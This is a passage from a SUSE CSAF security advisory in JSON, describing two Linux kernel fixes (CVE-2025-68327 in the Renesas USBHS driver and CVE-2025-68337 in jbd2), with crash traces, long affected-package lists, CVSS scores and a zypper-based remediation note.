7100003f 1a9f07e1 531c6c22 f9400001 (79400021)\n ---[ end trace 0000000000000000 ]---\n note: sh[188] exited with irqs disabled\n note: sh[188] exited with preempt_count 1\n\nThe issue occurs because usbhs_sys_function_pullup(), which accesses the IP\nregisters, is executed after the USBHS clocks have been disabled. The\nproblem is reproducible on the Renesas RZ/G3S SoC starting with the\naddition of module stop in the clock enable/disable APIs. With module stop\nfunctionality enabled, a bus error is expected if a master accesses a\nmodule whose clock has been stopped and module stop activated.\n\nDisable the IP clocks at the end of remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68327",
"url": "https://www.suse.com/security/cve/CVE-2025-68327"
},
{
"category": "external",
"summary": "SUSE Bug 1255488 for CVE-2025-68327",
"url": "https://bugzilla.suse.com/1255488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68327"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
